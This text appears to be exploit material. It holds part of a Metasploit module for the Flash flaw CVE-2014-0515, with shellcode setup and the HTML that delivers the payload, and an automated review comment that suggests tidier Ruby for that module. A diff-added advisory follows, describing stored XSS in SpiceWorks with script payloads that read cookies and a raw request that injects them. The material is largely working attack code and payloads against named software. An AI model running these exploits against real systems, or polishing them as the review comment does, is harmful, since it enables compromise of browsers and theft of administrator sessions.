vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-0515'],
['BID', '67092'],
['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Apr 28 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
flash_payload = ""
get_payload(cli,target_info).unpack("V*").each do |i|
flash_payload << "0x#{i.to_s(16)},"
end
flash_payload.gsub!(/,$/, "")
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
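Review bot: In `create_swf` at the bottom of the hunk, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` twice — `File.open` with a block already returns the block's value, so the inner assignment is dead and the method reduces to `::File.binread(path)`. In `exploit_template`, the `each` loop that appends `"0x#{i.to_s(16)},"` and then strips the trailing comma with `gsub!(/,$/, "")` is a join in disguise: `flash_payload = get_payload(cli, target_info).unpack("V*").map { |i| "0x#{i.to_s(16)}" }.join(",")` does the same with no trailing-comma fix-up. Neither change alters behaviour; both make the intent readable at a glance.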


@ -0,0 +1,103 @@
# Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system
# Date: 12/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://spiceworks.com
# Software Link: http://download.spiceworks.com/Spiceworks.exe
# Version: 7.2.00174 (Latest)
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
1. About the application:
=======================
SpiceWorks is an IT ticketing system deployed in many companies around the world
2. Vulnerability Description:
=========================
Multiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code.
once an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker
could potentially steal the admin's cookies.
3. PoC Videos:
===============
https://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be
https://www.youtube.com/watch?v=efIyZRTDS9c
Steps to reproduce:
i. Create a ticket in user_portal with the title <script>alert(document.cookie);</script>
ii. submit.
iii. login as admin user and navigate to the open tickets, the XSS appears.
4. Session Logs:
<-> Vulnerability 1 <->
<div id="helpdesk" class="helpdesk-root">
</div>
<script type="text/javascript">
//<![CDATA[
window.startingEventId = 112;
window.eventGeneration = '3b30b3bfedfae8be30d2b5412fc93003';
window.HelpDesk.on("before:start", function() {
this.options = {
dateFormat: "%m/%d/%y",
timeFormat: "%I:%M %p",
currencySymbol: "$",
allowDelete: true,
categories: ["","Maintenance","End User Support"],
admin: [{"id":1,"first_name":"user","last_name":"far","email":"admin@gmx.com","role":"admin","department":"IT","avatar_path":null,"primary_phone":null,"show_url":"/people/1"},{"id":3,"first_name":"dolev","last_name":"test","email":"attacker@gmail.com","role":"helpdesk_tech","department":null,"avatar_path":null,"primary_phone":null,"show_url":"/people/3"}],
customAttrs: [],
disableShortcuts: '',
data: {
ticketView: {"name":"open_tickets","label":"Open Tickets","sort_by":"id","sort_dir":"desc","hidden_cols":["created_at","closed_at","category","site"],"tickets":[{"id":11,"summary":"\u003Cscript\u003Ealert(document.cookie);\u003C/script\u003E","status":"open"
selectedSite: "all",
remoteSites: [{"name":"Central Server","site_id":1}]
}
};
});
//]]>
</script>
</div>
<-> Vulnerability 2 <->
POST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1
Host: ip.add.re.ss
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.186.31/settings/advanced?more_settings=true
Content-Length: 177
Cookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); spiceworks_session=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%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D